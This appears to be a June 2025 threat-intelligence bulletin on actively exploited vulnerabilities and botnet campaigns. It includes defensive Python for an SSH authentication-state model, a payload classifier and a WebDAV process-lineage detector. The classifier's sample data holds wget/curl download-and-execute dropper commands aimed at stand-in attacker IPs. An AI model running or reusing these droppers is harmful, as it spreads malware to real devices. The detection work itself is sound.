Cyber Threat Highlights: From Mirai Botnet Abuse to KEV-Worthy Critical Flaws

June 13, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

Enterprise systems remain in the crosshairs as zero-day and critical flaws surface in widely deployed technologies. This week, CISA expanded its Known Exploited Vulnerabilities (KEV) catalog with four actively exploited flaws affecting Wazuh Server, Erlang/OTP SSH Server, Microsoft’s WebDAV component, and Roundcube Webmail.

Botnet activity rose noticeably as threat actors expanded exploitation campaigns using malware families such as EnemyBot, Sysrv-K, Andoryu, and AndroxGh0st. These families abused known vulnerabilities in widely used software such as Spring Cloud Gateway, GitLab, and PHP-based services (PHPUnit). At the same time, IoT-focused botnets, including Bashlite, BrickerBot, Tsunami, and Mirai, intensified attacks on Eir D1000 modems, compromising exposed devices to extend their footprint.

This week also saw threat actors aggressively targeting both critical infrastructure and legacy systems. Akamai reported that Mirai botnet variants are actively exploiting a critical flaw in Wazuh Server, while CERT Polska attributed ongoing abuse of a year-old Roundcube Webmail vulnerability to the UNC1151 threat group. Check Point Research uncovered a targeted attack on a Turkish defense organization by Stealth Falcon that exploited a zero-day in Microsoft's WebDAV component. Kaspersky observed a surge in attacks on TBK DVR-4104 and DVR-4216 devices that is expanding the reach of a Mirai variant, and FortiGuard Labs flagged a phishing campaign exploiting an outdated Microsoft Office flaw to distribute FormBook malware.

Trending / Critical Vulnerabilities

The vulnerabilities below are the most widely discussed and most actively exploited this week; they are listed here to help prioritize patching and detection work.

CVE-2025-24016
A deserialization of untrusted data vulnerability in Wazuh Server allows remote code execution by anyone who can reach the Wazuh API with valid credentials (a compromised dashboard or another server in the cluster, and in some configurations a compromised agent). Rated critical with a CVSS score of 9.9, the flaw affects versions 4.4.0 through 4.9.0 and is fixed in version 4.9.1. Akamai's Security Intelligence and Response Team (SIRT) detected exploitation attempts within weeks of the public disclosure in February 2025. The vulnerability has since been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, signaling that urgent action is required.

CVE-2025-32433
A missing authentication for a critical function vulnerability in the Erlang/OTP SSH server, assigned a CVSS score of 10.0 (critical), affects versions prior to OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. The server processes SSH connection-protocol messages before user authentication has completed, so a remote unauthenticated attacker can send crafted SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST messages to execute arbitrary commands or cause a denial of service. The Erlang/OTP project has released fixes in the versions listed above. With multiple proof-of-concept exploits publicly available and active exploitation confirmed, this vulnerability has also been added to the CISA KEV catalog; affected organizations should patch immediately and, until they do, restrict access to the Erlang SSH listener to trusted hosts.
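The security-relevant point of CVE-2025-32433 is that message handling must be gated on authentication state, not only on message type. The Python model below is an added illustration, not Erlang/OTP's ssh code: it replays the pre-authentication SSH_MSG_CHANNEL_OPEN / SSH_MSG_CHANNEL_REQUEST sequence described above against a dispatcher that checks only the message number and against one that refuses connection-protocol messages until SSH_MSG_USERAUTH_SUCCESS. The message numbers are the real ones from RFC 4250 and RFC 4254; the Session class, the dispatch functions and the otp_version_vulnerable helper (which compares a version string against the fixed releases named in the text) are assumptions made for the example.

```python
"""Model of the authentication-state check whose absence is described for
CVE-2025-32433. Added illustration; not Erlang/OTP's ssh application."""
from dataclasses import dataclass, field

# Message numbers from RFC 4250 (numbers), RFC 4252 (userauth), RFC 4254 (connection).
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
CONNECTION_PROTOCOL_RANGE = range(80, 128)  # RFC 4254 messages live in 80-127


@dataclass
class Session:
    authenticated: bool = False
    channels: set = field(default_factory=set)
    executed: list = field(default_factory=list)   # commands the server ran
    disconnected: bool = False


def _handle_connection_msg(sess, msg_type, payload):
    """RFC 4254 handling shared by both dispatchers (hypothetical, simplified)."""
    if msg_type == SSH_MSG_CHANNEL_OPEN:
        sess.channels.add(payload["sender_channel"])
        return "channel_open_confirmation"
    if msg_type == SSH_MSG_CHANNEL_REQUEST:
        if payload["channel"] in sess.channels and payload["request"] == "exec":
            sess.executed.append(payload["command"])
            return "channel_success"
        return "channel_failure"
    return "unimplemented"


def _handle_userauth(sess, payload, valid_creds):
    if (payload["user"], payload["password"]) in valid_creds:
        sess.authenticated = True
        return "userauth_success"
    return "userauth_failure"


def dispatch_vulnerable(sess, msg_type, payload, valid_creds=frozenset()):
    """Dispatches on message type alone: connection-protocol messages are
    honoured whether or not user authentication has completed."""
    if msg_type == SSH_MSG_USERAUTH_REQUEST:
        return _handle_userauth(sess, payload, valid_creds)
    return _handle_connection_msg(sess, msg_type, payload)


def dispatch_hardened(sess, msg_type, payload, valid_creds=frozenset()):
    """Gates on authentication state: a connection-protocol message before
    SSH_MSG_USERAUTH_SUCCESS is a protocol violation and ends the session."""
    if sess.disconnected:
        return "disconnect"
    if msg_type == SSH_MSG_USERAUTH_REQUEST:
        return _handle_userauth(sess, payload, valid_creds)
    if msg_type in CONNECTION_PROTOCOL_RANGE and not sess.authenticated:
        sess.disconnected = True
        return "disconnect"
    return _handle_connection_msg(sess, msg_type, payload)


def run_preauth_exec(dispatch):
    """Replays the message sequence from the text against a fresh session with
    no credentials presented; returns the commands the server executed."""
    sess = Session()
    dispatch(sess, SSH_MSG_CHANNEL_OPEN, {"sender_channel": 0})
    dispatch(sess, SSH_MSG_CHANNEL_REQUEST,
             {"channel": 0, "request": "exec", "command": "id"})
    return sess.executed


# First fixed release per maintained OTP line, as stated in the advisory.
FIXED_OTP = {25: (25, 3, 2, 20), 26: (26, 2, 5, 11), 27: (27, 3, 3)}


def otp_version_vulnerable(version):
    """True if an OTP release string ('OTP-26.2.5.10' or '26.2.5.10') predates
    the fixed release of its line. Lines outside 25-27 return None: check the
    release notes rather than guessing. Assumes dotted components compare as
    integer tuples (a prefix such as 26.2.5 sorts before 26.2.5.11)."""
    parts = tuple(int(p) for p in version.removeprefix("OTP-").split("."))
    fixed = FIXED_OTP.get(parts[0])
    if fixed is None:
        return None
    return parts < fixed


if __name__ == "__main__":
    print("vulnerable dispatcher executed:", run_preauth_exec(dispatch_vulnerable))
    print("hardened dispatcher executed:", run_preauth_exec(dispatch_hardened))
    print("OTP-26.2.5.10 vulnerable:", otp_version_vulnerable("OTP-26.2.5.10"))
```

The hardened dispatcher still accepts the same channel messages once a SSH_MSG_USERAUTH_REQUEST has succeeded; the only change is the state check, which is the whole fix class for this CWE.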

CVE-2025-33053
An external control of file name or path vulnerability in Web Distributed Authoring and Versioning (WebDAV), rated High (CVSS 8.8), allows remote code execution over a network. Check Point Research discovered the flaw while it was being exploited as a zero-day, and Microsoft has since addressed it in a security update. Exploitation relies on a legitimate Windows tool being started with its working directory on an attacker-controlled WebDAV server, so that the helper executables the tool launches are resolved from that server instead of from the system directory. Because of its active exploitation, the vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog.

CVE-2024-42009
A cross-site scripting (XSS) vulnerability in Roundcube Webmail, rated critical with a CVSS score of 9.3, affects versions 1.5.7 and below and 1.6.7 and below. The flaw, discovered by Sonar in 2024, originates from a desanitization issue in the message_body() function in program/actions/mail/show.php, which lets an attacker embed a script in a crafted email message. Once the victim views the email, the attacker can read or send emails from the victim's account without any further interaction. Roundcube fixed the issue in versions 1.5.8 and 1.6.8 in 2024. According to CERT Polska, the vulnerability has recently been exploited in the wild, prompting its inclusion in the CISA KEV catalog.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft's Cytellite sensors was analyzed to determine which vulnerabilities are actively being exploited and which are actively being scanned for. As supporting evidence, source IPv4 addresses and payloads can be provided on a need-to-know basis.

CVE | Product | Severity | Title | Exploited in the wild | CISA KEV
CVE-2024-47176 | OpenPrinting CUPS (cups-browsed) | Medium | Improper Input Validation Vulnerability in cups-browsed through 2.0.1 leads to remote code execution | True | False
CVE-2024-4577 | PHP-CGI on Windows | Critical | Argument Injection Vulnerability in PHP on Windows servers | True | True
CVE-2024-3721 | TBK DVR devices | Medium | OS Command Injection Vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | False | False
CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command Injection Vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True
CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass Vulnerability in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure | True | True
CVE-2023-4966 | NetScaler ADC and NetScaler Gateway | Critical | Buffer Overflow Vulnerability in NetScaler ADC and NetScaler Gateway leads to sensitive information disclosure | True | True
CVE-2023-4415 | Ruijie RG-EW1200G 07161417 r483 | High | Improper Authentication Vulnerability in Ruijie RG-EW1200G 07161417 r483 | False | False
CVE-2023-38646 | Metabase Open Source and Enterprise | Critical | Remote Code Execution Vulnerability in Metabase Open Source and Metabase Enterprise | True | False
CVE-2023-24488 | Citrix ADC and Citrix Gateway | Medium | Cross-Site Scripting Vulnerability in Citrix ADC and Citrix Gateway | True | False
CVE-2023-26801 | LB-LINK devices | Critical | Command Injection Vulnerability in LB-LINK devices | True | False

Vulnerabilities abused by Botnet

The table lists vulnerabilities exploited by botnets, including recent CVEs logged in MISP. It presents the top five CVEs whose captured payloads are characteristic of botnet activity, such as wget or curl commands that fetch a payload from a bare IP address and then execute it.

CVE | Product | Title | Exploit | Abused by Botnet
CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-22205 | GitLab (ExifTool) | Remote Code Execution Vulnerability in GitLab via ExifTool image processing | True | Andoryu
CVE-2017-9841 | PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st
CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control (TR-064) Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai
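The heuristic the botnet table is built on (a download from a bare IPv4 address followed by chmod or direct execution) is simple enough to run over raw sensor payloads. The Python classifier below is an added example, not Cytellite's pipeline: it URL-decodes each captured request, looks for a wget/curl fetch from an IP literal and an execution step, and attributes the request to a CVE from the table when its path is unambiguous (only the PHPUnit eval-stdin.php and Spring Cloud Gateway actuator paths are mapped; the others need more context than a path). The sample lines are constructed for this example using documentation IP ranges, and the regexes, function names and the path-to-CVE map are assumptions.

```python
"""Classifier for honeypot request payloads showing botnet-style
download-and-run behaviour. Added example; sample lines are constructed,
not Cytellite telemetry."""
import re
from urllib.parse import unquote

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# A wget/curl invocation whose target is a bare IPv4 (optionally with scheme
# and port), captured up to the end of the URL path.
FETCH_RE = re.compile(
    rf"\b(?:wget|curl)\b[^;|&]*?(?:https?://|tftp://)?({IPV4})(?::\d+)?/[^\s;|&'\"]*"
)
# An execution step at the start of a shell command: chmod +x / chmod 7xx,
# "sh <file>" or "./<file>". The leading class keeps "d.sh -o" from matching.
EXEC_RE = re.compile(r"(?:^|[;&|\s])(?:chmod\s+(?:\+x|[0-7]{3,4})|sh\s+\S|\./\S+)")

# Request paths from the botnet table whose meaning is unambiguous.
PATH_TO_CVE = {
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php": "CVE-2017-9841",
    "/actuator/gateway/routes": "CVE-2022-22947",
}


def classify(line):
    """Returns whether the decoded payload looks like a botnet dropper, the
    IP it downloads from, and the CVE its request path matches, if any."""
    decoded = unquote(line)  # %-encoded command strings are common in captures
    fetch = FETCH_RE.search(decoded)
    execs = EXEC_RE.search(decoded)
    cve = next((c for p, c in PATH_TO_CVE.items() if p in decoded), None)
    return {
        "botnet_like": bool(fetch and execs),
        "download_ip": fetch.group(1) if fetch else None,
        "cve": cve,
    }


def classify_all(lines):
    return [classify(line) for line in lines]


# Constructed sample captures (documentation addresses 203.0.113.0/24,
# 198.51.100.0/24 and 192.0.2.0/24 stand in for attacker hosts).
SAMPLE_LINES = [
    # 1: PHPUnit RCE path carrying a classic IoT-style dropper
    'POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 '
    '<?php system("cd /tmp; wget http://203.0.113.7/x86; chmod 777 x86; ./x86 phpunit"); ?>',
    # 2: Spring Cloud Gateway actuator route with a SpEL-wrapped shell command
    'POST /actuator/gateway/routes/hacktest HTTP/1.1 {"filters":[{"name":"AddResponseHeader",'
    '"args":{"name":"Result","value":"#{T(java.lang.Runtime).getRuntime().exec('
    "'curl -s 198.51.100.20:8080/d.sh -o /tmp/d.sh; sh /tmp/d.sh')}\"}}]}",
    # 3: ordinary health probe, no exploitation
    "GET /actuator/health HTTP/1.1",
    # 4: vulnerability check against the PHPUnit path, but no dropper
    'GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 <?php echo md5("probe"); ?>',
    # 5: URL-encoded dropper on a generic CGI path (no CVE attribution)
    "POST /cgi-bin/cmd HTTP/1.1 cmd=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F192.0.2.9%2Farm7"
    "%3Bchmod%20%2Bx%20arm7%3B.%2Farm7",
]

if __name__ == "__main__":
    for line, result in zip(SAMPLE_LINES, classify_all(SAMPLE_LINES)):
        print(result, "<-", line[:60])
```

Line 4 is the useful negative case: a request for a known-vulnerable path is scanning or verification, not botnet propagation, and only the combination of fetch-from-IP plus execution should move a source into the botnet column.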

Vulnerabilities Abused by Malware

CVE-2025-24016
Akamai observed that, beginning in early March 2025, multiple Mirai botnet variants started exploiting CVE-2025-24016 to deploy malicious shell scripts that act as downloaders for Mirai-based payloads. Among the samples identified was "morte," part of the LZRD Mirai family, which is known for targeting a range of IoT architectures.

In a separate campaign detected in May, another Mirai variant named "resgod" (Resbot) emerged. It stood out for its use of Italian-language domain names such as "gestisciweb[.]com" ("manage web"), suggesting a focus on Italian-speaking networks or infrastructure. Both campaigns exploit vulnerabilities beyond the Wazuh flaw, indicating well-resourced, multi-exploit operations. Akamai's findings are the first confirmed cases of CVE-2025-24016 being used in active attacks, so organizations running affected Wazuh versions should evaluate their exposure and patch without delay.

CVE-2025-33053
In March 2025, Check Point Research uncovered an attempted attack on a Turkish defense entity. The attackers exploited CVE-2025-33053, which allows the working directory of a trusted Windows tool such as iediagcmd.exe to be pointed at an attacker-controlled WebDAV server; helper binaries the tool launches are then resolved from that server, so the attacker's executable runs under the cover of a legitimate process.

The campaign has been attributed to Stealth Falcon, also known as FruityArmor, an APT group active since 2012 that has historically targeted government and defense organizations across the Middle East and North Africa, including Turkey, Egypt, Qatar, and Yemen. Using this vulnerability as a zero-day to execute malware directly from a WebDAV server shows the group continuing to evolve its tradecraft.
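From a detection standpoint, the CVE-2025-33053 technique leaves a distinctive process-lineage trace: a System32 binary whose working directory is a WebDAV share spawns a child whose image path is on that share rather than in System32. The Python check below is an added example over constructed Sysmon-style process-creation events (Event ID 1 fields Image, ParentImage and CurrentDirectory); it is not Check Point's detection logic, and the WebDAV path forms it recognizes (the mini-redirector's \\host@80\, \\host@443\, \\host@SSL\ and DavWWWRoot notation) are the only assumptions besides the function names. The child name route.exe in the first sample is illustrative.

```python
"""Process-lineage check for the CVE-2025-33053 pattern. Added example over
constructed Sysmon-style events; not Check Point's detection logic."""
import re

# UNC forms the Windows WebDAV mini-redirector produces for a WebDAV share:
# \\host@80\..., \\host@443\..., \\host@SSL\..., and the DavWWWRoot alias.
# Plain SMB paths (\\host\share) deliberately do not match.
WEBDAV_PATH_RE = re.compile(r"^\\\\[^\\]+@(?:ssl|\d{1,5})\\|\\davwwwroot\\",
                            re.IGNORECASE)
SYSTEM32_PREFIX = "c:\\windows\\system32\\"


def is_webdav_path(path):
    """True for a path on a WebDAV share as mounted by the redirector."""
    return bool(WEBDAV_PATH_RE.search(path))


def suspicious_webdav_launch(event):
    """Flags a process-creation event when a System32 parent whose working
    directory is on a WebDAV share spawns a child whose image also sits on
    that share: a helper binary was resolved from the attacker's directory
    instead of from System32."""
    parent = event["ParentImage"].lower()
    child = event["Image"].lower()
    cwd = event.get("CurrentDirectory", "").lower()
    return (parent.startswith(SYSTEM32_PREFIX)
            and is_webdav_path(cwd)
            and is_webdav_path(child))


def scan(events):
    """Returns the ids of matching events, in order."""
    return [e["id"] for e in events if suspicious_webdav_launch(e)]


# Constructed events (not real telemetry); 203.0.113.5 is a documentation
# address standing in for an attacker-controlled WebDAV host.
SAMPLE_EVENTS = [
    {"id": 1,  # the CVE-2025-33053 shape
     "ParentImage": r"C:\Windows\System32\iediagcmd.exe",
     "Image": r"\\203.0.113.5@80\DavWWWRoot\route.exe",
     "CurrentDirectory": r"\\203.0.113.5@80\DavWWWRoot"},
    {"id": 2,  # same parent, helper correctly resolved from System32
     "ParentImage": r"C:\Windows\System32\iediagcmd.exe",
     "Image": r"C:\Windows\System32\route.exe",
     "CurrentDirectory": r"C:\Users\alice"},
    {"id": 3,  # user runs an installer from a corporate WebDAV share via Explorer
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"\\files.example.com@SSL\DavWWWRoot\tools\setup.exe",
     "CurrentDirectory": r"\\files.example.com@SSL\DavWWWRoot\tools"},
    {"id": 4,  # SMB share, not WebDAV
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"\\fileserver\share\tool.exe",
     "CurrentDirectory": r"\\fileserver\share"},
]

if __name__ == "__main__":
    print("flagged event ids:", scan(SAMPLE_EVENTS))
```

Event 3 is the tuning trade-off: executing anything from a WebDAV share is worth a lower-severity alert in most environments, but the high-confidence signal for this CVE is the System32 parent, which is why the rule requires it.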

CVE-2024-3721
Kaspersky researchers have identified a new surge of attacks exploiting CVE-2024-3721 to distribute an updated Mirai variant. The campaign specifically targets vulnerable DVR-based surveillance systems, broadening Mirai's reach beyond the device classes it traditionally infects. Kaspersky's telemetry shows the highest concentration of infected systems in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. What makes this wave particularly concerning is the size of the exposed population: internet-wide scans identified over 50,000 publicly accessible DVR units. That attack surface materially increases the potential scale of the botnet and the risk to both consumer and enterprise surveillance infrastructure.

CVE-2024-42009
CERT Polska has attributed active exploitation of this Roundcube Webmail vulnerability to UNC1151, a threat group associated with Belarusian state-sponsored operations and potentially linked to Russian intelligence services. This is the first documented instance of UNC1151 using this particular flaw. The vulnerability lets an attacker steal sensitive information such as emails and contact lists, send messages from the compromised account, and maintain persistence in the victim's browser across restarts, enabling prolonged email exfiltration and credential theft. No user interaction is required beyond viewing the crafted email, which significantly raises the likelihood of compromise. The campaign used tailored spear-phishing emails with urgent subject lines such as "[!IMPORTANT] Invoice to reservation number: S2500650676," crafted to impersonate legitimate travel-related business correspondence and aimed specifically at Polish organizations.

CVE-2017-0199
FortiGuard Labs has identified a high-severity phishing campaign aimed at users of outdated Microsoft Office installations. The campaign uses a malicious Excel attachment to exploit CVE-2017-0199, a long-standing vulnerability in Office's Object Linking and Embedding (OLE) handling, and delivers FormBook, a well-known information stealer that harvests login credentials, keystrokes, and clipboard contents. Opening the Excel file triggers a chain of stages that ends in execution of the FormBook payload. The campaign underscores the ongoing risk posed by unpatched legacy software in enterprise environments.

CVE | Severity | Title | Patch | Targeted by Malware | OSS
CVE-2025-24016 | Critical | Deserialization of Untrusted Data Vulnerability in Wazuh Server | Yes | Mirai botnet, Resbot | Yes
CVE-2025-33053 | High | External Control of File Name or Path Vulnerability in WebDAV | Yes | Stealth Falcon (aka FruityArmor) | No
CVE-2024-3721 | Medium | Command Injection Vulnerability in TBK DVR-4104 and DVR-4216 digital video recorders | No | Mirai | No
CVE-2024-42009 | Critical | Cross-Site Scripting Vulnerability in Roundcube Webmail | Yes | UNC1151 | Yes
CVE-2017-0199 | High | Remote Code Execution Vulnerability in Microsoft Office and WordPad | Yes | FormBook | No

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities that are disclosed, and potentially exploited, before they are published in the National Vulnerability Database. The LOVI platform aggregates such disclosures from open sources and social media; it currently tracks over 100 security alerts, with coverage planned to expand.

CVE-ID | Type of Vulnerability | Product
CVE-2025-0078 | Privilege Escalation | Android
CVE-2025-5820 | Authentication Bypass | Sony XAV-AX8500 (Bluetooth)
CVE-2025-30198 | Use of Hard-coded Cryptographic Key | ECOVACS DEEBOT vacuum and base station
CVE-2025-49218 | SQL Injection | Trend Micro Endpoint Encryption

External References

  1. https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-adds-two-known-exploited-vulnerabilities-catalog
  2. https://www.cisa.gov/news-events/alerts/2025/06/09/cisa-adds-two-known-exploited-vulnerabilities-catalog
  3. https://www.akamai.com/blog/security-research/botnets-flaw-mirai-spreads-through-wazuh-vulnerability
  4. https://research.checkpoint.com/2025/stealth-falcon-zero-day/
  5. https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/
  6. https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload
  7. https://cert.pl/en/posts/2025/06/unc1151-campaign-roundcube/
